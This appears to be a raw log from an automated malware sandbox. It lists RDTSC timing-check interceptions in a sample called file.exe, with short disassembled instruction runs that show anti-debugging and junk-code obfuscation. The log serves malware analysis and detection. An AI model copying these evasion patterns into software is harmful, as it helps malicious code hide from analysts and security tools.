        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FADD3 second address: 7FADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8033BC second address: 8033C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80749D second address: 8074A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA1CCF9D8B6h 0x0000000a popad 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8074A8 second address: 8074B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E73A second address: 80E740 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812E96 second address: 812EA0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1CCCD2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812EA0 second address: 812EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FA1CCF9D8BAh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007FA1CCF9D8B6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813037 second address: 81303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81303B second address: 81303F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81303F second address: 81305B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1CCCD2153h 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248C8 second address: 7248CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248CC second address: 7248D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248D4 second address: 7248EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCF9D8BEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248EC second address: 7248FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Fh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248FF second address: 724905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724905 second address: 724911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FA1CCCD2146h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823080 second address: 82309A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1CCF9D8C2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82309A second address: 8230A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 832300 second address: 83230A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1CCF9D8B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847F60 second address: 847F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA1CCCD214Ah 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FA1CCCD214Ch 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 jmp 00007FA1CCCD2156h 0x0000001a popad 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847F9D second address: 847FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C1h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8480DC second address: 8480E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8480E5 second address: 8480EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA1CCF9D8BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8480EF second address: 848119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007FA1CCCD2146h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FA1CCCD214Ah 0x00000012 js 00007FA1CCCD2146h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007FA1CCCD2148h 0x00000023 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84826E second address: 848274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848274 second address: 848282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FA1CCCD2146h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848282 second address: 848286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848286 second address: 8482C2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA1CCCD2156h 0x00000010 jmp 00007FA1CCCD2159h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8485D4 second address: 8485DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8485DA second address: 8485DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8485DE second address: 8485E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8485E4 second address: 8485EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8485EE second address: 8485F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8485F2 second address: 8485FC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCCD2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848882 second address: 8488A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jo 00007FA1CCF9D8B6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1CCF9D8C5h 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848B61 second address: 848B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848B67 second address: 848B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FA1CCF9D8BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848B8F second address: 848B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EBC7 second address: 84EBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8507AA second address: 8507AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0330 second address: 52F0341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0341 second address: 52F038F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA1CCCD2159h 0x00000014 sub si, 7556h 0x00000019 jmp 00007FA1CCCD2151h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F038F second address: 52F0393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0393 second address: 52F03CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA1CCCD214Bh 0x00000012 adc ax, 868Eh 0x00000017 jmp 00007FA1CCCD2159h 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03CD second address: 52F03E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F03E9 second address: 52F0425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FA1CCCD2157h 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA1CCCD2155h 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F043D second address: 52F0443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0443 second address: 52F045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCCD2156h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531060C second address: 5310676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push ecx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA1CCF9D8C8h 0x00000013 or ch, FFFFFFA8h 0x00000016 jmp 00007FA1CCF9D8BBh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov cx, 8CB5h 0x00000021 mov ax, 3F31h 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FA1CCF9D8C7h 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007FA1CCF9D8BBh 0x00000036 push esi 0x00000037 pop edx 0x00000038 popad 0x00000039 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310778 second address: 53107D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3E52h 0x00000007 pushfd 0x00000008 jmp 00007FA1CCCD2153h 0x0000000d sbb cl, 0000004Eh 0x00000010 jmp 00007FA1CCCD2159h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebp-04h] 0x0000001c jmp 00007FA1CCCD214Eh 0x00000021 nop 0x00000022 pushad 0x00000023 mov cx, D49Dh 0x00000027 mov ah, 1Dh 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53107D5 second address: 53107DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310835 second address: 531083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531083B second address: 531083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531083F second address: 5310853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310853 second address: 5310879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1CCF9D8BDh 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310908 second address: 531001B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1CCCD2157h 0x00000009 or esi, 70836D6Eh 0x0000000f jmp 00007FA1CCCD2159h 0x00000014 popfd 0x00000015 jmp 00007FA1CCCD2150h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pop esi 0x0000001e pushad 0x0000001f mov edx, ecx 0x00000021 pushad 0x00000022 mov ecx, 09A840DFh 0x00000027 push eax 0x00000028 pop edx 0x00000029 popad 0x0000002a popad 0x0000002b leave 0x0000002c pushad 0x0000002d push eax 0x0000002e mov eax, edi 0x00000030 pop ebx 0x00000031 pushfd 0x00000032 jmp 00007FA1CCCD2154h 0x00000037 and ecx, 71EF2E78h 0x0000003d jmp 00007FA1CCCD214Bh 0x00000042 popfd 0x00000043 popad 0x00000044 retn 0004h 0x00000047 nop 0x00000048 sub esp, 04h 0x0000004b xor ebx, ebx 0x0000004d cmp eax, 00000000h 0x00000050 je 00007FA1CCCD2295h 0x00000056 xor eax, eax 0x00000058 mov dword ptr [esp], 00000000h 0x0000005f mov dword ptr [esp+04h], 00000000h 0x00000067 call 00007FA1D1A4DC9Bh 0x0000006c mov edi, edi 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FA1CCCD2157h 0x00000075 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531001B second address: 531003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7D7C749Ah 0x00000008 movsx ebx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FA1CCF9D8BAh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dl, cl 0x0000001a mov esi, ebx 0x0000001c popad 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531003D second address: 5310043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310043 second address: 5310047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310047 second address: 531004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531004B second address: 5310073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA1CCF9D8C8h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310073 second address: 5310078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310078 second address: 5310119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA1CCF9D8C5h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FA1CCF9D8C1h 0x0000000f adc cl, 00000036h 0x00000012 jmp 00007FA1CCF9D8C1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push FFFFFFFEh 0x0000001d pushad 0x0000001e call 00007FA1CCF9D8BCh 0x00000023 movzx esi, di 0x00000026 pop edx 0x00000027 pushfd 0x00000028 jmp 00007FA1CCF9D8BCh 0x0000002d sub cl, FFFFFF88h 0x00000030 jmp 00007FA1CCF9D8BBh 0x00000035 popfd 0x00000036 popad 0x00000037 push 6B245CEFh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov edi, ecx 0x00000041 pushfd 0x00000042 jmp 00007FA1CCF9D8BCh 0x00000047 jmp 00007FA1CCF9D8C5h 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310119 second address: 531015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0A8A4159h 0x00000010 pushad 0x00000011 mov bx, cx 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 push 5BFF3C9Ah 0x0000001d jmp 00007FA1CCCD2150h 0x00000022 xor dword ptr [esp], 2E5617EAh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531015E second address: 5310162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310162 second address: 53101C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ah, FBh 0x00000008 popad 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1CCCD2151h 0x00000016 and cx, F4C6h 0x0000001b jmp 00007FA1CCCD2151h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FA1CCCD2150h 0x00000027 add ah, 00000068h 0x0000002a jmp 00007FA1CCCD214Bh 0x0000002f popfd 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53101C2 second address: 53101F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA1CCF9D8C1h 0x0000000a add cx, D786h 0x0000000f jmp 00007FA1CCF9D8C1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53101F0 second address: 53101F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53101F6 second address: 53101FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53101FA second address: 53101FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53101FE second address: 531024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA1CCF9D8C6h 0x0000000e nop 0x0000000f pushad 0x00000010 mov si, 04EDh 0x00000014 mov eax, 3C4B02E9h 0x00000019 popad 0x0000001a sub esp, 18h 0x0000001d jmp 00007FA1CCF9D8C4h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx ebx, ax 0x00000029 mov al, 99h 0x0000002b popad 0x0000002c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531024A second address: 53102D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1CCCD214Eh 0x00000009 add si, 5218h 0x0000000e jmp 00007FA1CCCD214Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA1CCCD2158h 0x0000001a or si, BC78h 0x0000001f jmp 00007FA1CCCD214Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 jmp 00007FA1CCCD2159h 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA1CCCD2158h 0x00000038 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53102D1 second address: 53102D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53102D5 second address: 53102DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53102DB second address: 53102F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1CCF9D8BAh 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53102F5 second address: 53102FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53102FB second address: 531030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531030C second address: 5310310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310310 second address: 531034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f pushfd 0x00000010 jmp 00007FA1CCF9D8C4h 0x00000015 sbb ecx, 77181D28h 0x0000001b jmp 00007FA1CCF9D8BBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 pushad 0x00000024 pushad 0x00000025 mov ebx, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531034E second address: 5310376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 mov di, 166Eh 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1CCCD2157h 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310376 second address: 531037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531037C second address: 5310394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d pushad 0x0000000e mov di, cx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ecx, 5519EDADh 0x00000018 rdtsc
